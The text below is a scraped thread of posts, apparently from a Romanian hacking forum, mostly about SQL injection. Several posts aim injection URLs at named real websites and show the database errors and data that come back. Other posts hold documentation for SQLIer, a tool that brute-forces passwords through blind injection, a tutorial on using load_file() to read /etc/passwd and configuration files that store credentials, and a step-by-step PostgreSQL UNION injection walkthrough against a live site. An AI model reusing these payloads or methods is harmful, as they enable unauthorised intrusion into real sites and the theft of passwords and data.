denjacker

formezi sintaxa pas cu pas pana cand observi ce anume e blocat.. desi daca erai putin atent tocmai s-a specificat pe aici pe undeva.

The challenge is to get some table_name+from+db.. but it's not that hard.

Felicitari si la mai mare. Bravo

i'm in .. ne vedem la Bran!

Nu fratioare... http://www.communityinclusion.org/staff.php?staff_id=129+group+by+156353535353543534 error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 group by 156353535353543534 ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.Unknown column '156353535353543534' in 'group statement'

Discutam aici sa inteleaga si ceilalti. http://www.communityinclusion.org/staff.php?staff_id=129+order+by+1-- hai sa privim eroarea mai atent : error in query1: SELECT a.article_id AS article_idx, article_title, timestamp, article_blurb, article_year_pub, article_month_pub FROM article a, article_staff at WHERE at.article_id = a.article_id and at.staff_id = 129 order by 1-- ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY rank, article_year_pub desc, article_month_pub desc limit 5' at line 3 De aici ar trebuii sa deduci : 1] commentul folosit pentru a termina query-ul e incomplet sau ... inutil. 2] nu poti folosi "order by 1 ORDER BY rank" -- > ptr ca iti va genera eroare de sintaxa. Incearca sa calculezi nr de coloane cu GROUP BY si apoi revino la punctul 1]. De fapt acolo e problema esentiala pentru rezolvarea competitiei.

spune unde te-ai incurcat ca sa stim cum sa te ajutam mai departe.

SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can't guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of site. SQLIer v0.8.2b Documentation -------------------------------------------------------------------------------- Table of Contents --------------------- Introduction I: Syntax I.a: Argument Descriptions I.b: Guessing Field Names II: General Usage -------------------------------------------------------------------------------- Introduction ---------------- SQLIer is a script that brute forces passwords through 'true/false' SQL Injection vulnerabilities. With 'true/false' SQL Injection vulnerabilities, you cannot actually query data out of the database, only ask a statement that is returned 'true' or 'false'. SQLIer takes each character's ASCII code and asks a 'higher/lower' question to the database, eventually reaching the actual character code. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites. An 8 character password (containing any character from decimal ASCII code 1-127) takes approximately 1 minute to crack. I. Syntax ------------- sqlier [OPTIONS] I.a: Options ---------------- -c [host] Clear all exploit information stored for [host]. -o [file] Output cracked passwords to [file]. -s [seconds] Wait [seconds] between page requests. -u [usernames] Usernames that will be brute forced from the database, comma separated (Username1,Username2,Username3). -w [options] Pass [options] to wget. I.b: Guessing Field Names ----------------------------- --table-names [table_names] Comma separated list of table names to guess. --user-fields [user_fields] Comma separated list of username fields to guess. --pass-fields [pass_fields] Comma separated list of password fields to guess. II. General Usage --------------------- Given there is an SQL Injection vulnerability at: http://example.com/sqlihole.php?id=1 Running "sqlier -s 10 http://example.com/sqlihole.php?id=1" will try to get enough information to exploit passwords out of the database, waiting 10 seconds in between each request. If the table, username field, and password field names have been guessed correctly, then the exploit is ready to brute force passwords out of the database by passing usernames to query, like so: sqlier -s 10 example.com -u BCable,administrator,root,user4 However, in the instance that the built in field/table names do not guess the correct fields, you can pass guesses like so: sqlier -s 10 example.com --table-names [table_names] --user-fields [user_fields] --pass-fields [pass_fields] Until the correct table, username field, and password field names are known, SQLIer cannot brute force passwords from the database. Note: If "-s" is not passed, each request is done immediately after the last request. This can raise red flags, however. http://bcable.net/releases.php?sqlier

mersi mult.. eBookVortex :: Signup ElbitZ.NET, Your Online Learning Center :: Login -> Registrations are currently closed. Next Aug 15th fiti pe faza care sunteti interesati.

begood'ica can i haz 1 ? sarumâna indiferent de reply !

ehhhhh ... ce vremuri bai tata, cand era Sketches tanar si nelinistit Stealth tu care erai ?

Nu ! .. asa arata pe vremuri (2007) Hack MD - Moldovian Hacking & Security Team Sunt curios cati ati prins vremurile alea si inca mai sunteti cat de cat activi ? ... in afara de Andrei

old people resurrected. .. a fost sigur pe hackmd! Salut si bun venit.

de ce-ai julit fa joaca omului ?

poza e de la balcescu sau din roaità ? )))))

http://conky.sourceforge.net/documentation.html tone de exemple, scripturi, tips & tricks ptr conky My Conky Config (Page 1) - Tips, Tricks & Scripts - CrunchBang Linux Forums

Hey, I've decided to write this little tutorial to let people understand how load_file() works, because it seems everyone is scared here of mysql version 4. What is load_file() ? Syntax: load_file('/blah/blah.php') It is mysql global function, that reads and outputs the contents of the local file. It is the best way to hack sites that have MySQL version 4. This is just an example on UNIX system with php files, but if you find such vulnerability, you can do many things, like: - read .htpasswd files, read php files without execution. - bypass directory listing and htaccess - read unix files at /etc/, like /etc/passwd. And many many more... But not all sites vulnerable to load_file()... So it is kinda rare thing. First, when you found a vuln. to SQLi site, you should select largest column possible (this can be column, that shows a lot of text). Here is our visible column: Second, to execute load_file() in the URL, you need to hex the path, becaurse if we put load_file('/blah/blah.php') inside URL, it will filter special symbols and load_file() will not work. For example /etc/passwd in hex is: 2f6574632f706173737764 So you should execute it like that: php?id=1 union select load_file(0x2f6574632f706173737764)-- (Notice: you should put "0x" before hex to let MySQL understand, that it's not normal input, but hexed code) After you executed, it should output the /etc/passwd file, where you can find your target directory's. As you see, on this screenshot it shows us directory for the site somesite.com: /home/webmaster/www/somesite.com If it doesn't show path anywhere (even in mysql error message while SQL injecting, or somewhere else), you can guess it yourself. For example, if you SQLi the site "blah.net", then you can try /home/webmaster/www/blah.net, or /home/webmaster/public_html/blah.net, or /home/webmaster/http/blah etc.. Third, once you found the site path, scan the site with Acunetix/other software to find filenames on this site. For example, it could be index.php or sensitive directorys, like /includes (it stores non-encrypted username and password for mysql users). In my example, I found directory /includes. The target file for mysql username and password is ussually config.php or config.inc.php or config.new.php. It depends, what kind of software site uses. If it uses wordpress or joomla or vbulletin, phpbb or some other crap, it would be too easy to find the right path for and name for this file (or any other files you want to dump Smile). Last step: just hex the path to file again, and execute: Hope this helps ! ChuckNorrisLove

Short Introduction For PostgreSQL. PostgreSQL, often simply Postgres, is an object-relational database management system (ORDBMS). It is released under an MIT-style license and is thus free and open source software . Version 7.x to 9.0 is latest. Note: before I proceed further I would like to tell my reader (begnners) Injection does not mean that Back end DB is vuln , that's cause by bad code of web developer and does not validate the input . Step-1: Getting Start with Union Based: Every db uses same principle to pull data out of db ofcourse it is select using apropriate column names. Im not goin to explain about select cause every1 know about it . Step-2: Checking Target For Vunl . http://www.crookedtree.org/index.php?catid=583' an error has occured with the database!SELECT * FROM bus_category WHERE id = 583\' Errors MYSQL with MYSQL or MS SQL with SQL or ORACLE with ORA or MS ACCESS with Jet and Warning: pg_exec () [function.pg-exec] <== PostgreSQL OR error like above. Step-3: Getting Number Of Columns For Getting columns we use same method used in other db order by we use -- or # for comments . http://www.crookedtree.org/index.php?catid=583 order by 1-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 2-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 3-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 4-- <== no error We will do increament of 1 till get an error and we have error on 14th column. That mean we have 13th columns (error_column_num - 1) = 13th . An other Method is executing query with union and get to the column I.E http://www.crookedtree.org/index.php?catid=-583 union select null-- <== error http://www.crookedtree.org/index.php?catid=-583 union select null,null-- <== error http://www.crookedtree.org/index.php?catid=-583 union select null,null,null-- <== error We will keep adding null till we get a blank page or site loaded . This method is really anoying Big Grin . Step-4: Getting Data for the visble Column. The term most of the ppl use is vuln column . Same like Oracle injection we will use Null data type for columns. Question is why????? Because we does not know about the datatype so using null datatype will do the trick for us. and ofcourse some site does have interger value so it will be use as vise versa. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,null,null,null,null,null, null,null,null,null,null-- Now can see page loaded with out error (some time loaded but content missing as in this site) . Now what but can not see any coulmn print on screen . Lets procceed with interger value but 0 . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,null,null,null,null,null,null,null,null,null,null,null,null-- <== no error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,null,null,null,null,null,null,null,null,null,null-- <== no error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0,null,null,null,null,null,null,null,null,null,null-- <== error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,0,null,null,null,null,null,null,null,null,null-- <== error Will keep replacing null with interget value "0" untill get an error . Wow we have an error on 3rd and 4th columns, there are other columns well but we stop here and move to next step. This what we are looking for . Step-5: Getting DB Version Now our query will be same as with null except 4th column , will replace it with version . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,version(),null,null,null,null,null,null,null,null,null-- PostgreSQL 8.2.9 on x86_64-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4) Now have got the db version Big Grin . Step-6: Getting Other DBz and Table Schema Im goin to check if this target having other db or not http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database-- AAA <== db we only see one database at a time, Now what to do hmmm how about using limit to get others Big Grin . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database LIMIT 1 OFFSET 1-- LIMIT 1 OFFSET 1 <== OFFSET value. If we keep changing this value then we will get next db Big Grin like 1 2 3.... . I will explain this how to use other db for injection in an other tutz . Now we will move to our injection. Step-6.1: Now Getting Table Schema. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES-- addbook Bad thing is cant concat hehehe aah so what to do now . We will have to use limit . Ive already explain how to use it . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES limit 1 offset 3-- artist_entry OR Table From Current DB Schema http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES where table_schema=current_schema() limit 1 offset 0-- addbook Just keep increasing the value and you will see next table . Step-7: Getting Columns Of Schema Now lets proceed with column enumeration. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns abbrev Getting columns for schema , again same one at a time , we will use limit here. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns limit 1 offset 1-- access_date Step-7.1 Getting Columns for Particular Table for Current DB Schema http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name=addbook-- What is wrong with this query ??? aah an error Big Grin . Remember mysql why we have to convert table name into char Im not goin to exlaining it here . But here senerio is little different for concat char we will use " || " pipe sign . We are using table name "addbook" We will convert our table name with oracle char , using hackbar addon . select table name and SQL--->ORACLE--->ORACLE CHAR() . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null, column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107)-- add1 Again to get other columns we will have to use limit Big Grin . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107) limit 1 offset 3-- city Step-8: Getting Data From Coulmn http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,city,null,null,null,null,null,null,null,null,null from addbook limit 1 offset 1-- Alanson Thats All folks Smile . Hope you have enjoyed it Smile . Post your valuable comments . Quick Cheat List: current_database() current_schema() current_user inet_client_addr() inet_client_port() inet_server_addr() inet_server_port() pg_my_temp_schema() pg_postmaster_start_time() session_user user version() getpgusername() Special Thanks to : N3T.CrAck3R , Sho0ter , Renorobert, NetSpy

3 in google si 2 in havij ... well done master! Sa te vad pana la dreptul de root! Cateodata am impresia ca vorbesc unul singur..

SQLite Manager - Firefox Add-ON : https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/

Discutabil. SQL Injection nu se rezuma la -1 union select 1,2,3/* ..gata! Sunt cazuri in care te poti lovi de filtre foarte complexe, sau pur si simplu trebuie sa-ti "faci loc" intr-un hardcore heavy query. Chiar si cand vine vorba de MySQL procedeul poate atinge un nivel foarte ridicat de complexitate. Nu o singura data am intalnit parametrii pentru care am pierdut ore/zile pana sa reusesc sa scot output cu versiunea. Sa nu mai vorbim de Oracle, PostgreSQL, Coldfusion, Interbase, Syngress, SQLite and so on. Deacord, cat merge HAVIJ, SQLmap, Pangolin sau Helper-ul .. sql injections toata lumea stie si e cel mai usor. Cat despre FMI nu stiu despre ce e vorba, nu ma intereseaza, deci nu ma bag. Alekum Salam

s-a mai discutat ca a fost, nu mai este, dar va fi..